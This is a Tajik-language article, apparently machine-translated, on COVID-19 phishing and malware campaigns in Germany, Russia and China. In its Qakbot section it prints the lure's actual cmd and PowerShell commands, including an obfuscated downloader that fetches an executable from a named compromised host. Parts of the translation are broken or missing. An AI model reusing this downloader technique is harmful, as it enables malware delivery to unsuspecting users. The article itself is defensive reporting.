Ҳамлагарон истифодаи мавзӯи COVID-19-ро идома дода, барои корбароне, ки ба ҳама чизҳои марбут ба эпидемия таваҷҷӯҳи зиёд доранд, таҳдидҳои бештар эҷод мекунанд. ДАР Мо аллакай дар бораи он, ки чӣ гуна нармафзори зараровар пас аз коронавирус пайдо шуд, сӯҳбат кардем ва имрӯз мо дар бораи усулҳои муҳандисии иҷтимоӣ, ки корбарон дар кишварҳои гуногун, аз ҷумла Русия, аллакай дучор омадаанд, сӯҳбат хоҳем кард. Тамоюлҳо ва мисолҳои умумӣ дар зери набуред.
Дар хотир доред Мо дар бораи он сӯҳбат кардем, ки одамон омодаанд на танҳо дар бораи коронавирус ва ҷараёни эпидемия, балки дар бораи чораҳои дастгирии молиявӣ низ бихонанд? Ана як мисоли хуб. Дар иёлати Рейн-Вестфалияи Шимолӣ ё NRW Олмон як ҳамлаи ҷолиби фишинг кашф шуд. Ҳамлагарон нусхаҳои вебсайти Вазорати иқтисодро (), ки ҳар кас метавонад барои кӯмаки молиявӣ муроҷиат кунад. Чунин барнома воқеан вуҷуд дорад ва он барои қаллобон муфид буд. Пас аз гирифтани маълумоти шахсии қурбониёни онҳо, онҳо дар вебсайти вазорати воқеӣ муроҷиат карданд, аммо реквизитҳои дигари бонкиро нишон доданд. Тибқи иттилои расмӣ, то ошкор шудани нақша 4 ҳазор чунин дархости қалбакӣ сурат гирифтааст. Дар натича 109 миллион долларе, ки барои шаҳрвандони зарардида пешбинӣ шуда буд, ба дасти қаллобон афтод.
Оё шумо мехоҳед озмоиши ройгон барои COVID-19?
Мисоли дигари муҳими фишинг дар мавзӯи коронавирус буд дар почтаи электронӣ. Паёмҳо таваҷҷӯҳи корбаронро бо пешниҳоди гузаштан аз ташхиси ройгони сирояти коронавирус ҷалб карданд. Дар замимаи инхо ҳолатҳои Trickbot/Qakbot/Qbot вуҷуд доштанд. Ва ҳангоме ки онҳое, ки мехоҳанд саломатии худро тафтиш кунанд, ба "пур кардани варақаи замимашуда" оғоз карданд, скрипти зараровар ба компютер бор карда шуд. Ва барои пешгирӣ кардани санҷиши регбокс, скрипт ба зеркашии вируси асосӣ танҳо пас аз чанд вақт оғоз кард, вақте ки системаҳои муҳофизат боварӣ доштанд, ки ягон амали зараровар рух намедиҳад.
Боварӣ додани аксари корбарон барои фаъол кардани макросҳо низ осон буд. Барои ин як ҳиллаи стандартӣ истифода шуд: барои пур кардани саволнома, шумо аввал бояд макросҳоро фаъол созед, яъне ба шумо лозим аст, ки скрипти VBA-ро иҷро кунед.
Тавре ки шумо мебинед, скрипти VBA аз антивирусҳо махсус ниқоб карда шудааст.
Windows дорои хусусияти интизорӣ мебошад, ки барнома пеш аз қабули ҷавоби пешфарзии "Ҳа" интизор мешавад /T <сонияҳо>. Дар ҳолати мо, скрипт пеш аз нест кардани файлҳои муваққатӣ 65 сония интизор шуд:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ва ҳангоми интизорӣ, нармафзори зараровар зеркашӣ карда шуд. Барои ин як скрипти махсуси PowerShell оғоз карда шуд:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Пас аз рамзкушоӣ кардани арзиши Base64, скрипти PowerShell пушти дари дар веб-сервери қаблан ҳакершуда аз Олмонро зеркашӣ мекунад:
http://automatischer-staubsauger.com/feature/777777.pngва онро бо номи зерин захира мекунад:
C:UsersPublictmpdirfile1.exe
папка ‘C:UsersPublictmpdir’ ҳангоми иҷро кардани файли 'tmps1.bat', ки фармонро дар бар мегирад, нест карда мешавад cmd /c mkdir ""C:UsersPublictmpdir"".
Ҳамлаи мақсаднок ба мақомоти давлатӣ
Илова бар ин, таҳлилгарони FireEye ба наздикӣ дар бораи ҳамлаи ҳадафмандонаи APT32 ба сохторҳои ҳукуматӣ дар Вуҳан ва инчунин Вазорати идоракунии изтирории Чин гузориш доданд. Яке аз RTF-ҳои паҳншуда истинод ба мақолаи New York Times бо сарлавҳа дошт . Аммо, ҳангоми хондани он, нармафзори зараровар зеркашӣ карда шуд (таҳлилгарони FireEye ин мисолро METALJACK муайян карданд).
Ҷолиб он аст, ки тибқи маълумоти Virustotal, ҳангоми ошкоркунӣ ҳеҷ яке аз антивирусҳо ин мисолро ошкор накардаанд.
Вақте ки вебсайтҳои расмӣ кор мекунанд
Намунаи барҷастатарини ҳамлаи фишингӣ рӯзи дигар дар Русия рух дод. Сабаби ин таъини кӯмакпулии деринтизор барои кӯдакони аз 3 то 16-сола буд. Вақте ки оғози қабули дархостҳо 12 майи соли 2020 эълон шуд, миллионҳо нафар барои кӯмаки деринтизор ба вебсайти Хадамоти давлатӣ шитофтанд ва порталро аз ҳамлаи касбии DDoS бадтар карданд. Вақте президент гуфт, ки "Хизматҳои давлатӣ аз ӯҳдаи ҷараёни муроҷиатҳо баромада наметавонанд", мардум дар интернет дар бораи роҳандозии сайти алтернативии қабули дархостҳо сӯҳбат карданд.
Мушкилот дар он аст, ки якчанд сайтҳо якбора ба кор шурӯъ карданд ва дар ҳоле ки як сайти воқеӣ дар posobie16.gosuslugi.ru воқеан дархостҳоро қабул мекунад, бештар .
Ҳамкорон аз SearchInform дар минтақаи .ru тақрибан 30 доменҳои нави қаллобӣ пайдо карданд. Ширкати Infosecurity ва Softline беш аз 70 вебсайти шабеҳи қалбакии хадамоти давлатиро аз аввали моҳи апрел пайгирӣ кардаанд. Эҷодкорони онҳо рамзҳои шиносро коркард мекунанд ва инчунин таркиби калимаҳои gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie ва ғайраро истифода мебаранд.
Гип ва муҳандисии иҷтимоӣ
Ҳамаи ин мисолҳо танҳо тасдиқ мекунанд, ки ҳамлагарон мавзӯи коронавирусро бомуваффақият пул кор мекунанд. Ва ҳар қадаре ки шиддати иҷтимоӣ баландтар бошад ва масъалаҳои норавшантар бошад, ҳамон қадар шанси қаллобон барои дуздидани маълумоти муҳим, маҷбур кардани одамонро маҷбур мекунанд, ки пулҳои худро мустақилона тарк кунанд ё танҳо компютерҳои бештарро вайрон кунанд.
Ва бо назардошти он, ки пандемия одамони эҳтимолан омоданашударо маҷбур кардааст, ки аз хона ба таври оммавӣ кор кунанд, на танҳо шахсӣ, балки маълумоти корпоративӣ низ зери хатар аст. Масалан, ба наздикӣ корбарони Microsoft 365 (собиқ Office 365) низ мавриди ҳамлаи фишинг қарор гирифтанд. Одамон ҳамчун замима ба ҳарфҳо паёмҳои овозии азими "пазмон" гирифтанд. Аммо, файлҳо воқеан як саҳифаи HTML буданд, ки қурбониёни ҳамларо ба он фиристоданд . Дар натиҷа, аз даст додани дастрасӣ ва вайрон кардани ҳама маълумот аз ҳисоб.
Манбаъ: will.com